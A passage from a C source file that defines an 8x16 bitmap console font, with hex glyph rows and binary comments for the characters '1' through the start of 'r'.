0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 49 0x31 '1' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x38, /* 00111000 */
0x78, /* 01111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 50 0x32 '2' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 51 0x33 '3' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x3c, /* 00111100 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 52 0x34 '4' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x0c, /* 00001100 */
0x1c, /* 00011100 */
0x3c, /* 00111100 */
0x6c, /* 01101100 */
0xcc, /* 11001100 */
0xfe, /* 11111110 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x1e, /* 00011110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 53 0x35 '5' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xfc, /* 11111100 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 54 0x36 '6' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x60, /* 01100000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xfc, /* 11111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 55 0x37 '7' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 56 0x38 '8' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 57 0x39 '9' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7e, /* 01111110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x78, /* 01111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 58 0x3a ':' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 59 0x3b ';' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 60 0x3c '<' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x06, /* 00000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 61 0x3d '=' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 62 0x3e '>' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 63 0x3f '?' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 64 0x40 '@' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xde, /* 11011110 */
0xde, /* 11011110 */
0xde, /* 11011110 */
0xdc, /* 11011100 */
0xc0, /* 11000000 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 65 0x41 'A' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 66 0x42 'B' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfc, /* 11111100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x7c, /* 01111100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0xfc, /* 11111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 67 0x43 'C' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0xc2, /* 11000010 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc2, /* 11000010 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 68 0x44 'D' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xf8, /* 11111000 */
0x6c, /* 01101100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x6c, /* 01101100 */
0xf8, /* 11111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 69 0x45 'E' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x66, /* 01100110 */
0x62, /* 01100010 */
0x68, /* 01101000 */
0x78, /* 01111000 */
0x68, /* 01101000 */
0x60, /* 01100000 */
0x62, /* 01100010 */
0x66, /* 01100110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 70 0x46 'F' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x66, /* 01100110 */
0x62, /* 01100010 */
0x68, /* 01101000 */
0x78, /* 01111000 */
0x68, /* 01101000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0xf0, /* 11110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 71 0x47 'G' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0xc2, /* 11000010 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xde, /* 11011110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x66, /* 01100110 */
0x3a, /* 00111010 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 72 0x48 'H' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 73 0x49 'I' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 74 0x4a 'J' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1e, /* 00011110 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x78, /* 01111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 75 0x4b 'K' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xe6, /* 11100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x6c, /* 01101100 */
0x78, /* 01111000 */
0x78, /* 01111000 */
0x6c, /* 01101100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0xe6, /* 11100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 76 0x4c 'L' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xf0, /* 11110000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x62, /* 01100010 */
0x66, /* 01100110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 77 0x4d 'M' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xee, /* 11101110 */
0xfe, /* 11111110 */
0xfe, /* 11111110 */
0xd6, /* 11010110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 78 0x4e 'N' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xe6, /* 11100110 */
0xf6, /* 11110110 */
0xfe, /* 11111110 */
0xde, /* 11011110 */
0xce, /* 11001110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 79 0x4f 'O' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 80 0x50 'P' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfc, /* 11111100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x7c, /* 01111100 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0xf0, /* 11110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 81 0x51 'Q' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xd6, /* 11010110 */
0xde, /* 11011110 */
0x7c, /* 01111100 */
0x0c, /* 00001100 */
0x0e, /* 00001110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 82 0x52 'R' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfc, /* 11111100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x7c, /* 01111100 */
0x6c, /* 01101100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0xe6, /* 11100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 83 0x53 'S' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x60, /* 01100000 */
0x38, /* 00111000 */
0x0c, /* 00001100 */
0x06, /* 00000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 84 0x54 'T' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x7e, /* 01111110 */
0x5a, /* 01011010 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 85 0x55 'U' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 86 0x56 'V' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x10, /* 00010000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 87 0x57 'W' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xfe, /* 11111110 */
0xee, /* 11101110 */
0x6c, /* 01101100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 88 0x58 'X' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x7c, /* 01111100 */
0x38, /* 00111000 */
0x38, /* 00111000 */
0x7c, /* 01111100 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 89 0x59 'Y' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 90 0x5a 'Z' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0x86, /* 10000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xc2, /* 11000010 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 91 0x5b '[' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 92 0x5c '\' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x80, /* 10000000 */
0xc0, /* 11000000 */
0xe0, /* 11100000 */
0x70, /* 01110000 */
0x38, /* 00111000 */
0x1c, /* 00011100 */
0x0e, /* 00001110 */
0x06, /* 00000110 */
0x02, /* 00000010 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 93 0x5d ']' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 94 0x5e '^' */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 95 0x5f '_' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xff, /* 11111111 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 96 0x60 '`' */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x0c, /* 00001100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 97 0x61 'a' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x78, /* 01111000 */
0x0c, /* 00001100 */
0x7c, /* 01111100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 98 0x62 'b' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xe0, /* 11100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x78, /* 01111000 */
0x6c, /* 01101100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 99 0x63 'c' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 100 0x64 'd' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1c, /* 00011100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x3c, /* 00111100 */
0x6c, /* 01101100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 101 0x65 'e' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 102 0x66 'f' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x1c, /* 00011100 */
0x36, /* 00110110 */
0x32, /* 00110010 */
0x30, /* 00110000 */
0x78, /* 01111000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x78, /* 01111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 103 0x67 'g' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x76, /* 01110110 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x7c, /* 01111100 */
0x0c, /* 00001100 */
0xcc, /* 11001100 */
0x78, /* 01111000 */
0x00, /* 00000000 */
/* 104 0x68 'h' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xe0, /* 11100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x6c, /* 01101100 */
0x76, /* 01110110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0xe6, /* 11100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 105 0x69 'i' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 106 0x6a 'j' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x00, /* 00000000 */
0x0e, /* 00001110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
/* 107 0x6b 'k' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xe0, /* 11100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x66, /* 01100110 */
0x6c, /* 01101100 */
0x78, /* 01111000 */
0x78, /* 01111000 */
0x6c, /* 01101100 */
0x66, /* 01100110 */
0xe6, /* 11100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 108 0x6c 'l' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 109 0x6d 'm' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xec, /* 11101100 */
0xfe, /* 11111110 */
0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 110 0x6e 'n' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xdc, /* 11011100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 111 0x6f 'o' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 112 0x70 'p' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xdc, /* 11011100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x7c, /* 01111100 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0xf0, /* 11110000 */
0x00, /* 00000000 */
/* 113 0x71 'q' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x76, /* 01110110 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x7c, /* 01111100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x1e, /* 00011110 */
0x00, /* 00000000 */
/* 114 0x72 'r' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
